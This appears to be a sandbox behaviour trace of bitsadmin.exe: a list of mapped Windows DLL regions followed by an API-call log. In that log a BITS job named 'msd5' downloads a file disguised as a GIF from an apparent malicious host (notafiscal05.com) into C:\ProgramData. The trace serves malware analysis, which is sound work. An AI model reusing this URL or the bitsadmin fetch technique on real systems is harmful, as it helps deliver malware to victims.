filename = ""
Region:
id = 1365
start_va = 0x20000
end_va = 0x2ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 1366
start_va = 0x90000
end_va = 0xf6fff
entry_point = 0x90000
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 1367
start_va = 0x100000
end_va = 0x1c7fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000100000"
filename = ""
Region:
id = 1368
start_va = 0x1e0000
end_va = 0x2dffff
entry_point = 0x0
region_type = private
name = "private_0x00000000001e0000"
filename = ""
Region:
id = 1369
start_va = 0x480000
end_va = 0x48ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000480000"
filename = ""
Region:
id = 1370
start_va = 0x745c0000
end_va = 0x745c8fff
entry_point = 0x745c0000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1371
start_va = 0x75320000
end_va = 0x75369fff
entry_point = 0x75320000
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 1372
start_va = 0x75370000
end_va = 0x75443fff
entry_point = 0x75370000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1373
start_va = 0x754b0000
end_va = 0x754b9fff
entry_point = 0x754b0000
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 1374
start_va = 0x75700000
end_va = 0x757abfff
entry_point = 0x75700000
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 1375
start_va = 0x757b0000
end_va = 0x75878fff
entry_point = 0x757b0000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1376
start_va = 0x75880000
end_va = 0x758cdfff
entry_point = 0x75880000
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 1377
start_va = 0x758d0000
end_va = 0x758e8fff
entry_point = 0x758d0000
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 1378
start_va = 0x75bc0000
end_va = 0x75c5cfff
entry_point = 0x75bc0000
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 1379
start_va = 0x75c70000
end_va = 0x768b9fff
entry_point = 0x75c70000
region_type = mapped_file
name = "shell32.dll"
filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll")
Region:
id = 1380
start_va = 0x768c0000
end_va = 0x76916fff
entry_point = 0x768c0000
region_type = mapped_file
name = "shlwapi.dll"
filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll")
Region:
id = 1381
start_va = 0x76a20000
end_va = 0x76b7bfff
entry_point = 0x76a20000
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 1382
start_va = 0x76da0000
end_va = 0x76e3ffff
entry_point = 0x76da0000
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 1383
start_va = 0x76e60000
end_va = 0x76f00fff
entry_point = 0x76e60000
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 1384
start_va = 0x7f6f0000
end_va = 0x7f7effff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007f6f0000"
filename = ""
Region:
id = 1385
start_va = 0x759b0000
end_va = 0x75a7bfff
entry_point = 0x759b0000
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 1386
start_va = 0x76e40000
end_va = 0x76e5efff
entry_point = 0x76e40000
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 1387
start_va = 0x1d0000
end_va = 0x1d6fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000001d0000"
filename = ""
Region:
id = 1388
start_va = 0x2e0000
end_va = 0x3e0fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002e0000"
filename = ""
Region:
id = 1389
start_va = 0x3f0000
end_va = 0x3f1fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000003f0000"
filename = ""
Region:
id = 1390
start_va = 0x400000
end_va = 0x400fff
entry_point = 0x400000
region_type = mapped_file
name = "bitsadmin.exe.mui"
filename = "\\Windows\\System32\\en-US\\bitsadmin.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\bitsadmin.exe.mui")
Region:
id = 1391
start_va = 0x410000
end_va = 0x410fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000410000"
filename = ""
Region:
id = 1392
start_va = 0x420000
end_va = 0x420fff
entry_point = 0x0
region_type = private
name = "private_0x0000000000420000"
filename = ""
Region:
id = 1393
start_va = 0xc40000
end_va = 0x183ffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000c40000"
filename = ""
Region:
id = 1394
start_va = 0x490000
end_va = 0x4ebfff
entry_point = 0x490000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1395
start_va = 0x490000
end_va = 0x4ebfff
entry_point = 0x490000
region_type = mapped_file
name = "rpcss.dll"
filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll")
Region:
id = 1396
start_va = 0x74fc0000
end_va = 0x74fcbfff
entry_point = 0x74fc0000
region_type = mapped_file
name = "cryptbase.dll"
filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll")
Region:
id = 1397
start_va = 0x736a0000
end_va = 0x736dffff
entry_point = 0x736a0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1398
start_va = 0x490000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000490000"
filename = ""
Region:
id = 1399
start_va = 0x570000
end_va = 0x64efff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000570000"
filename = ""
Region:
id = 1400
start_va = 0x430000
end_va = 0x430fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000430000"
filename = ""
Region:
id = 1401
start_va = 0x770c0000
end_va = 0x77142fff
entry_point = 0x770c0000
region_type = mapped_file
name = "clbcatq.dll"
filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll")
Region:
id = 1402
start_va = 0x758f0000
end_va = 0x7597efff
entry_point = 0x758f0000
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 1403
start_va = 0x440000
end_va = 0x440fff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000440000"
filename = ""
Region:
id = 1404
start_va = 0x4f0000
end_va = 0x52ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000004f0000"
filename = ""
Region:
id = 1405
start_va = 0x530000
end_va = 0x56ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000530000"
filename = ""
Region:
id = 1406
start_va = 0x7ffdd000
end_va = 0x7ffddfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdd000"
filename = ""
Region:
id = 1407
start_va = 0x680000
end_va = 0x6bffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000680000"
filename = ""
Region:
id = 1408
start_va = 0x74b40000
end_va = 0x74b55fff
entry_point = 0x74b40000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1409
start_va = 0x7ffdc000
end_va = 0x7ffdcfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdc000"
filename = ""
Region:
id = 1410
start_va = 0x490000
end_va = 0x4cbfff
entry_point = 0x490000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1411
start_va = 0x490000
end_va = 0x4cbfff
entry_point = 0x490000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1412
start_va = 0x490000
end_va = 0x4cbfff
entry_point = 0x490000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1413
start_va = 0x490000
end_va = 0x4cbfff
entry_point = 0x490000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1414
start_va = 0x490000
end_va = 0x4cbfff
entry_point = 0x490000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1415
start_va = 0x748e0000
end_va = 0x7491afff
entry_point = 0x748e0000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1416
start_va = 0x6c0000
end_va = 0x98efff
entry_point = 0x6c0000
region_type = mapped_file
name = "sortdefault.nls"
filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls")
Region:
id = 1417
start_va = 0x75060000
end_va = 0x7506dfff
entry_point = 0x75060000
region_type = mapped_file
name = "rpcrtremote.dll"
filename = "\\Windows\\System32\\RpcRtRemote.dll" (normalized: "c:\\windows\\system32\\rpcrtremote.dll")
Region:
id = 1418
start_va = 0xa20000
end_va = 0xa5ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000a20000"
filename = ""
Region:
id = 1419
start_va = 0xb90000
end_va = 0xbcffff
entry_point = 0x0
region_type = private
name = "private_0x0000000000b90000"
filename = ""
Region:
id = 1420
start_va = 0x7ffda000
end_va = 0x7ffdafff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffda000"
filename = ""
Region:
id = 1421
start_va = 0x7ffdb000
end_va = 0x7ffdbfff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffdb000"
filename = ""
Region:
id = 1422
start_va = 0x6f8b0000
end_va = 0x6f8b8fff
entry_point = 0x6f8b0000
region_type = mapped_file
name = "qmgrprxy.dll"
filename = "\\Windows\\System32\\qmgrprxy.dll" (normalized: "c:\\windows\\system32\\qmgrprxy.dll")
Thread:
id = 135
os_tid = 0xc0c
[0066.623] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x6fb34 | out: lpSystemTimeAsFileTime=0x6fb34*(dwLowDateTime=0xd8613a70, dwHighDateTime=0x1d469c7))
[0066.623] GetCurrentProcessId () returned 0xc08
[0066.623] GetCurrentThreadId () returned 0xc0c
[0066.623] GetTickCount () returned 0x1ea10
[0066.623] QueryPerformanceCounter (in: lpPerformanceCount=0x6fb2c | out: lpPerformanceCount=0x6fb2c*=1814056900000) returned 1
[0066.624] GetModuleHandleA (lpModuleName=0x0) returned 0xbf0000
[0066.624] __set_app_type (_Type=0x1)
[0066.624] __p__fmode () returned 0x757a31f4
[0066.624] __p__commode () returned 0x757a31fc
[0066.624] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xc17f33) returned 0x0
[0066.625] __wgetmainargs (in: _Argc=0xc30824, _Argv=0xc3082c, _Env=0xc30828, _DoWildCard=0, _StartInfo=0xc30838 | out: _Argc=0xc30824, _Argv=0xc3082c, _Env=0xc30828) returned 0
[0066.625] _onexit (_Func=0xc1925e) returned 0xc1925e
[0066.625] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7
[0066.625] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb
[0066.626] AitLogFeatureUsageByApp () returned 0x0
[0066.626] VerSetConditionMask (ConditionMask=0x0, TypeMask=0x0, Condition=0x2) returned 0x18
[0066.626] VerSetConditionMask (ConditionMask=0x18, TypeMask=0x80000000, Condition=0x1) returned 0x1b
[0066.626] VerifyVersionInfoW (in: lpVersionInformation=0x6f9a8, dwTypeMask=0x3, dwlConditionMask=0x1b | out: lpVersionInformation=0x6f9a8) returned 1
[0066.626] SetLastError (dwErrCode=0x0)
[0066.626] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0066.627] GetProcAddress (hModule=0x75370000, lpProcName="HeapSetInformation") returned 0x753c4157
[0066.627] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
[0066.627] GetCurrentProcess () returned 0xffffffff
[0066.627] GetCurrentThread () returned 0xfffffffe
[0066.627] GetCurrentProcess () returned 0xffffffff
[0066.627] DuplicateHandle (in: hSourceProcessHandle=0xffffffff, hSourceHandle=0xfffffffe, hTargetProcessHandle=0xffffffff, lpTargetHandle=0xc1c3b0, dwDesiredAccess=0x0, bInheritHandle=1, dwOptions=0x2 | out: lpTargetHandle=0xc1c3b0*=0x80) returned 1
[0066.627] SetConsoleCtrlHandler (HandlerRoutine=0xc074cb, Add=1) returned 1
[0066.627] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75370000
[0066.627] GetProcAddress (hModule=0x75370000, lpProcName="SetThreadUILanguage") returned 0x753c24c2
[0066.627] SetThreadUILanguage (LangId=0x0) returned 0x409
[0066.627] _wsetlocale (category=1, locale=".OCP") returned="English_United States.437"
[0066.628] _wsetlocale (category=3, locale=".OCP") returned="English_United States.437"
[0066.628] _wsetlocale (category=4, locale=".OCP") returned="English_United States.437"
[0066.629] _wsetlocale (category=5, locale=".OCP") returned="English_United States.437"
[0066.629] _wcsicmp (_String1="/transfer", _String2="/RAWRETURN") returned 2
[0066.629] _wcsicmp (_String1="/transfer", _String2="/WRAP") returned -3
[0066.629] _wcsicmp (_String1="/transfer", _String2="/NOWRAP") returned 6
[0066.629] swprintf_s (in: _Dst=0x6faa0, _SizeInWords=0x12, _Format="%u.%u.%u" | out: _Dst="7.5.7601") returned 8
[0066.630] GetFileType (hFile=0x7) returned 0x2
[0066.630] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x6fa14 | out: lpMode=0x6fa14) returned 1
[0066.630] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fa44, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa44*=0x2) returned 1
[0066.630] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x24, lpNumberOfCharsWritten=0x6fa50, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa50*=0x24) returned 1
[0066.630] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x1e, lpNumberOfCharsWritten=0x6fa54, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa54*=0x1e) returned 1
[0066.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x29, lpNumberOfCharsWritten=0x6fa58, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa58*=0x29) returned 1
[0066.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fa5c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa5c*=0x2) returned 1
[0066.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5e, lpNumberOfCharsWritten=0x6fa60, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa60*=0x5e) returned 1
[0066.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x58, lpNumberOfCharsWritten=0x6fa64, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa64*=0x58) returned 1
[0066.631] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x6fa68, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6fa68*=0x2) returned 1
[0066.632] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0
[0066.642] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0066.642] GetNumberOfConsoleInputEvents (in: hConsoleInput=0x3, lpNumberOfEvents=0x6fab4 | out: lpNumberOfEvents=0x6fab4) returned 1
[0066.642] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3
[0066.642] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0xc1c3a8 | out: lpMode=0xc1c3a8) returned 1
[0066.643] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0xc1c390 | out: lpConsoleScreenBufferInfo=0xc1c390) returned 1
[0066.643] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0xc1c38c | out: lpMode=0xc1c38c) returned 1
[0066.643] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1
[0066.643] _wcsicmp (_String1="/transfer", _String2="/HELP") returned 12
[0066.643] _wcsicmp (_String1="/transfer", _String2="/?") returned 53
[0066.643] _wcsicmp (_String1="/transfer", _String2="/UTIL") returned -1
[0066.643] _wcsicmp (_String1="/transfer", _String2="/LIST") returned 8
[0066.643] _wcsicmp (_String1="/transfer", _String2="/MONITOR") returned 7
[0066.643] _wcsicmp (_String1="/transfer", _String2="/RESET") returned 2
[0066.643] _wcsicmp (_String1="/transfer", _String2="/TRANSFER") returned 0
[0066.644] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x1) returned 1
[0066.644] _wcsicmp (_String1="/priority", _String2="/UPLOAD") returned -5
[0066.644] _wcsicmp (_String1="/priority", _String2="/DOWNLOAD") returned 12
[0066.644] _wcsicmp (_String1="/priority", _String2="/PRIORITY") returned 0
[0066.644] _wcsicmp (_String1="foreground", _String2="FOREGROUND") returned 0
[0066.644] CoCreateInstance (in: rclsid=0xc065d4*(Data1=0x4991d34b, Data2=0x80a1, Data3=0x4291, Data4=([0]=0x83, [1]=0xb6, [2]=0x33, [3]=0x28, [4]=0x36, [5]=0x6b, [6]=0x90, [7]=0x97)), pUnkOuter=0x0, dwClsContext=0x4, riid=0xc065b4*(Data1=0x5ce34c0d, Data2=0xdc9, Data3=0x4c1f, Data4=([0]=0x89, [1]=0x7c, [2]=0xda, [3]=0xa1, [4]=0xb7, [5]=0x8c, [6]=0xee, [7]=0x7c)), ppv=0xc1c3b4 | out: ppv=0xc1c3b4*=0x1fa54c) returned 0x0
[0066.689] IBackgroundCopyManager:CreateJob (in: This=0x1fa54c, DisplayName="msd5", Type=0x0, pJobId=0x6fa7c, ppJob=0x6fa78 | out: pJobId=0x6fa7c*(Data1=0x9c63a56f, Data2=0x17ee, Data3=0x40ed, Data4=([0]=0xb6, [1]=0x50, [2]=0x4e, [3]=0xbe, [4]=0x55, [5]=0x9, [6]=0xd5, [7]=0xa3)), ppJob=0x6fa78*=0x1fa624) returned 0x0
[0066.698] CoTaskMemAlloc (cb=0x50) returned 0x210cb0
[0066.698] IUnknown:AddRef (This=0x1fa624) returned 0x2
[0066.698] IUnknown:AddRef (This=0x1fa624) returned 0x3
[0066.698] PeekMessageW (in: lpMsg=0x6f9f4, hWnd=0x0, wMsgFilterMin=0x400, wMsgFilterMax=0x400, wRemoveMsg=0x0 | out: lpMsg=0x6f9f4) returned 0
[0066.698] IUnknown:Release (This=0x1fa624) returned 0x2
[0066.698] IBackgroundCopyJob:SetPriority (This=0x1fa624, Val=0x0) returned 0x0
[0066.701] IBackgroundCopyJob:AddFile (This=0x1fa624, RemoteUrl="http://xbr6lge984320911.notafiscal05.com:25067/04/marxvxinhhmdx.gif.zip?258277672", LocalName="C:\\ProgramData\\tempa\\marxvxinhhmdx.gif") returned 0x0
[0066.708] IBackgroundCopyJob:SetNotifyFlags (This=0x1fa624, Val=0xb) returned 0x0
[0066.711] IBackgroundCopyJob:SetNotifyInterface (This=0x1fa624, Val=0x210cb0) returned 0x0
[0066.711] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f4f8 | out: ppvObject=0x6f4f8*=0x0) returned 0x80004002
[0066.711] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a63e0c*(Data1=0x3, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f4b8 | out: ppvObject=0x6f4b8*=0x0) returned 0x80004002
[0066.711] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a597c4*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f4a0 | out: ppvObject=0x6f4a0*=0x0) returned 0x80004002
[0066.711] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a69b0c*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f454 | out: ppvObject=0x6f454*=0x210cb0) returned 0x0
[0066.712] IUnknown:AddRef (This=0x210cb0) returned 0x3
[0066.712] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a4c15c*(Data1=0x18, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6f3b4 | out: ppvObject=0x6f3b4*=0x0) returned 0x80004002
[0066.712] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a4c0a8*(Data1=0x19, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x210dc4 | out: ppvObject=0x210dc4*=0x0) returned 0x80004002
[0066.712] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a4c16c*(Data1=0x4c1e39e1, Data2=0xe3e3, Data3=0x4296, Data4=([0]=0xaa, [1]=0x86, [2]=0xec, [3]=0x93, [4]=0x8d, [5]=0x89, [6]=0x6e, [7]=0x92)), ppvObject=0x6f3bc | out: ppvObject=0x6f3bc*=0x0) returned 0x80004002
[0066.712] IUnknown:Release (This=0x210cb0) returned 0x2
[0066.715] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x201978*(Data1=0x659cdeac, Data2=0x489e, Data3=0x11d9, Data4=([0]=0xa9, [1]=0xcd, [2]=0x0, [3]=0xd, [4]=0x56, [5]=0x96, [6]=0x52, [7]=0x51)), ppvObject=0x6e8bc | out: ppvObject=0x6e8bc*=0x0) returned 0x80004002
[0066.716] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x201978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x6e8bc | out: ppvObject=0x6e8bc*=0x210cb0) returned 0x0
[0066.716] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x201978*(Data1=0x97ea99c7, Data2=0x186, Data3=0x4ad4, Data4=([0]=0x8d, [1]=0xf9, [2]=0xc5, [3]=0xb4, [4]=0xe0, [5]=0xed, [6]=0x6b, [7]=0x22)), ppvObject=0x208300 | out: ppvObject=0x208300*=0x210cb0) returned 0x0
[0066.718] IBackgroundCopyJob:Resume (This=0x1fa624) returned 0x0
[0066.725] IUnknown:QueryInterface (in: This=0x210cb0, riid=0x76a4c17c*(Data1=0x1c733a30, Data2=0x2a1c, Data3=0x11ce, Data4=([0]=0xad, [1]=0xe5, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x44, [6]=0x77, [7]=0x3d)), ppvObject=0x6ee0c | out: ppvObject=0x6ee0c*=0x0) returned 0x80004002
[0066.725] IBackgroundCopyCallback:JobModification (This=0x210cb0, pJob=0x1fa6b4, dwReserved=0x0) returned 0x0
[0066.725] IBackgroundCopyJob:GetState (in: This=0x1fa624, pVal=0x210cbc | out: pVal=0x210cbc) returned 0x0
[0066.728] IBackgroundCopyJob:GetType (in: This=0x1fa624, pVal=0x6e978 | out: pVal=0x6e978) returned 0x0
[0066.729] IBackgroundCopyJob:GetProgress (in: This=0x1fa624, pVal=0x210cc0 | out: pVal=0x210cc0) returned 0x0
[0066.730] IBackgroundCopyJob:GetPriority (in: This=0x1fa624, pVal=0x6e974 | out: pVal=0x6e974) returned 0x0
[0066.731] CoTaskMemFree (pv=0x0)
[0066.731] IBackgroundCopyJob:GetDisplayName (in: This=0x1fa624, pVal=0x6e98c | out: pVal=0x6e98c*="msd5") returned 0x0
[0066.732] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e934 | out: lpConsoleScreenBufferInfo=0x6e934) returned 1
[0066.732] FillConsoleOutputCharacterW (in: hConsoleOutput=0x7, cCharacter=0x20, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfCharsWritten=0x6e94c | out: lpNumberOfCharsWritten=0x6e94c) returned 1
[0066.733] FillConsoleOutputAttribute (in: hConsoleOutput=0x7, wAttribute=0x7, nLength=0x5dc0, dwWriteCoord=0x0, lpNumberOfAttrsWritten=0x6e94c | out: lpNumberOfAttrsWritten=0x6e94c) returned 1
[0066.733] SetConsoleCursorPosition (hConsoleOutput=0x7, dwCursorPosition=0x0) returned 1
[0066.733] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.734] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e920 | out: lpConsoleScreenBufferInfo=0x6e920) returned 1
[0066.734] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0xa, lpNumberOfCharsWritten=0x6e938, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e938*=0xa) returned 1
[0066.734] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.734] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e91c | out: lpConsoleScreenBufferInfo=0x6e91c) returned 1
[0066.735] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x5, lpNumberOfCharsWritten=0x6e934, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e934*=0x5) returned 1
[0066.735] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0xf) returned 1
[0066.735] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e924 | out: lpConsoleScreenBufferInfo=0x6e924) returned 1
[0066.735] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x6e93c, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e93c*=0x7) returned 1
[0066.736] SetConsoleTextAttribute (hConsoleOutput=0x7, wAttributes=0x7) returned 1
[0066.736] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x7, lpConsoleScreenBufferInfo=0x6e918 | out: lpConsoleScreenBufferInfo=0x6e918) returned 1
[0066.736] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0xc243c4*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x6e930, lpReserved=0x0 | out: lpBuffer=0xc243c4*, lpNumberOfCharsWritten=0x6e930*=0x8) returned 1
